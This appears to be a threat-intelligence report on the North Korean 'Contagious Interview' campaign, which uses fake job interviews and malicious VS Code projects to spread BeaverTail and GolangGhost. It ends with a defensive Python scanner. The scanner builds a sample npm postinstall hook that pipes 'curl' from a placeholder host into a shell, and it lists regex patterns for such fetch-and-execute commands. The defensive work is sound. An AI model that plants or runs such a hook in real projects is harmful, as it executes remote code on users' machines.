# Full Report
As many as 3,136 individual IP addresses linked to likely targets of the Contagious Interview activity have been identified, with the campaign claiming 20 potential victim organizations spanning artificial intelligence (AI), cryptocurrency, financial services, IT services, marketing, and software development sectors in Europe, South Asia, the Middle East, and Central America. The new findings
# Analysis Summary
# Threat Actor: PurpleBravo (Contagious Interview Activity)
## Attribution & Identity
**Attribution:** North Korean threat activity cluster.
**Known Aliases and Associated Groups:** CL-STA-0240, DeceptiveDevelopment, DEV#POPPER, Famous Chollima, Gwisin Gang, Tenacious Pungsan, UNC5342, Void Dokkaebi, WaterPlum. Associated with the Wagemole (aka PurpleDelta) campaign cluster due to tactical and infrastructure overlaps.
## Activity Summary
PurpleBravo is responsible for the "Contagious Interview" activity, first documented in late 2023. This campaign leverages fake job interview lures, specifically targeting software developers and IT candidates, often using malicious Microsoft Visual Studio Code (VS Code) projects provided during coding assessments. In several instances, candidates executed malicious code on corporate devices while performing assessments, exposing their employers. The identified activity spanned from August 2024 to September 2025.
## Tactics, Techniques & Procedures
- **Social Engineering:** Use of fictitious job offers and phony recruitment processes (LinkedIn personas posing as developers/recruiters) to gain initial access.
- **Supply Chain Compromise (Developer Workflow):** Abusing trusted developer workflows by using malicious VS Code projects to distribute backdoors.
- **Initial Access:** Candidates executing malicious code on corporate devices during technical assessments.
- **Malware Deployment:** Distribution of malware families like BeaverTail (a JavaScript infostealer/loader) and GolangGhost (a Go-based backdoor).
- **Infrastructure Management:** Administration of C2 communications via Astrill VPN and from IP ranges located in China.
## Targeting
- **Sectors:** Artificial Intelligence (AI), Cryptocurrency, Financial Services, IT Services, Marketing, and Software Development.
- **Geography:** Victims identified across Europe, South Asia, the Middle East, and Central America. Specific victim countries include Belgium, Bulgaria, Costa Rica, India, Italy, the Netherlands, Pakistan, Romania, the U.A.E., and Vietnam.
- **Victims:** Identified 3,136 individual IP addresses linked to likely targets, with 20 potential victim organizations identified.
## Tools & Infrastructure
- **Malware Families:** BeaverTail (JavaScript infostealer/loader), GolangGhost (Go-based backdoor, based on HackBrowserData open-source tool).
- **Infrastructure (C2, domains, IPs):** C2 servers hosted across 17 different providers. C2 administration observed originating via Astrill VPN and from IP ranges in China.
## Implications
PurpleBravo demonstrates a sophisticated, targeted approach focused on exploiting the IT software supply chain by infiltrating organizations via the hiring and vetting process for technical staff. The success of this method allows the actor to gain access to sensitive corporate networks through trusted candidates executing assessments, achieving twin goals of cyber espionage and financial theft.
## Mitigations
- **Vetting Security:** Implement strict security protocols for all technical assessments, especially those that require candidates to run code; such code should run only in sandboxed development environments, never on corporate devices. Assess the security hygiene of the development environments used by external testers and candidates.
- **Endpoint & Network Monitoring:** Enhance detection coverage for the presence, execution, and lateral movement of known malware families such as BeaverTail and GolangGhost.
- **VPN Monitoring:** Investigate and monitor source IP ranges associated with C2 infrastructure, noting the actor's observed use of Astrill VPN to obscure command-and-control administration.
- **Supply Chain Integrity:** Focus security efforts on the software supply chain, recognizing that trusted developer workflows are a primary infiltration vector.
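The report describes malicious VS Code projects handed to candidates during coding assessments and recommends strict vetting of any assessment that requires running code. The report does not say which project feature the lures abused, so the following is an added example, not code from the report or any vendor: a pre-assessment scanner for two hooks that VS Code and npm act on without an explicit user command (a `tasks.json` task with `runOptions.runOn: "folderOpen"`, and npm lifecycle scripts such as `postinstall`), plus a small heuristic check for fetch-and-execute one-liners. The sample project it builds, the `example.invalid` URL, and the pattern list are all constructed for illustration.

```python
"""
Scan a take-home coding-assessment project for auto-execution hooks before
opening it in an editor. Added example for this report; heuristics are
constructed, not indicators from the report.
"""
import json
import re
import tempfile
from pathlib import Path

# npm lifecycle scripts that run automatically during `npm install`
NPM_AUTO_HOOKS = {"preinstall", "install", "postinstall", "prepare", "prepublish"}

# Constructed heuristic patterns for remote fetch-and-execute or obfuscation
SUSPICIOUS_PATTERNS = [
    re.compile(r"\bcurl\b.*\|\s*(ba)?sh\b"),
    re.compile(r"\bwget\b.*\|\s*(ba)?sh\b"),
    re.compile(r"\beval\s*\("),
    re.compile(r"\bnew Function\s*\("),
    re.compile(r"\bchild_process\b"),
    re.compile(r"\bbase64\b", re.IGNORECASE),
    re.compile(r"https?://"),
]


def _load_json(path: Path):
    """Read JSON, tolerating the line comments VS Code allows in tasks.json."""
    try:
        text = path.read_text(encoding="utf-8")
    except OSError:
        return None
    text = re.sub(r"^\s*//.*$", "", text, flags=re.M)
    try:
        return json.loads(text)
    except ValueError:
        return None


def _flag_text(where: str, text: str, findings: list) -> None:
    """Record the first heuristic pattern that matches the given text."""
    for pat in SUSPICIOUS_PATTERNS:
        if pat.search(text):
            findings.append(f"{where}: matches /{pat.pattern}/")
            break


def scan_vscode_tasks(root: Path, findings: list) -> None:
    """Flag tasks configured to run as soon as the folder is opened."""
    data = _load_json(root / ".vscode" / "tasks.json")
    if not isinstance(data, dict):
        return
    for task in data.get("tasks", []):
        label = task.get("label", "<unnamed>")
        if (task.get("runOptions") or {}).get("runOn") == "folderOpen":
            findings.append(f".vscode/tasks.json: task '{label}' auto-runs on folderOpen")
        _flag_text(f".vscode/tasks.json task '{label}'", json.dumps(task), findings)


def scan_npm_scripts(root: Path, findings: list) -> None:
    """Flag npm lifecycle hooks that execute during `npm install`."""
    data = _load_json(root / "package.json")
    if not isinstance(data, dict):
        return
    for name, cmd in (data.get("scripts") or {}).items():
        if name in NPM_AUTO_HOOKS:
            findings.append(f"package.json: lifecycle hook '{name}' runs on install: {cmd}")
            _flag_text(f"package.json script '{name}'", str(cmd), findings)


def scan_project(root) -> list:
    """Return a list of human-readable findings for the project at `root`."""
    root = Path(root)
    findings: list = []
    scan_vscode_tasks(root, findings)
    scan_npm_scripts(root, findings)
    return findings


def build_sample_project(root: Path, malicious: bool) -> None:
    """Write a constructed sample project; the malicious variant carries a
    folderOpen task and a postinstall hook (illustrative data, not real IoCs)."""
    (root / ".vscode").mkdir(parents=True, exist_ok=True)
    scripts = {"test": "node test.js"}
    if malicious:
        scripts["postinstall"] = (
            "node -e \"require('child_process')"
            ".exec('curl https://example.invalid/x | sh')\"")
    (root / "package.json").write_text(json.dumps({"name": "assessment", "scripts": scripts}))
    task = {"label": "build", "type": "shell", "command": "npm run build"}
    if malicious:
        task["runOptions"] = {"runOn": "folderOpen"}
    (root / ".vscode" / "tasks.json").write_text(
        "// constructed sample tasks file\n" + json.dumps({"version": "2.0.0", "tasks": [task]}))


def demo() -> dict:
    """Scan a malicious and a clean constructed project; returns findings per variant."""
    results = {}
    for variant in ("malicious", "clean"):
        with tempfile.TemporaryDirectory() as d:
            build_sample_project(Path(d), malicious=(variant == "malicious"))
            results[variant] = scan_project(d)
    return results


if __name__ == "__main__":
    for variant, findings in demo().items():
        print(f"{variant}: {len(findings)} finding(s)")
        for f in findings:
            print("  -", f)
```

Run it against the unpacked assessment folder (`scan_project("/path/to/assessment")`) on a disposable machine before anything opens the project in VS Code or runs `npm install`; any finding means the project should be reviewed by hand and executed, if at all, only in an isolated sandbox. The heuristics are deliberately loose and will produce false positives on legitimate build scripts, which is acceptable for a gate that only triggers manual review.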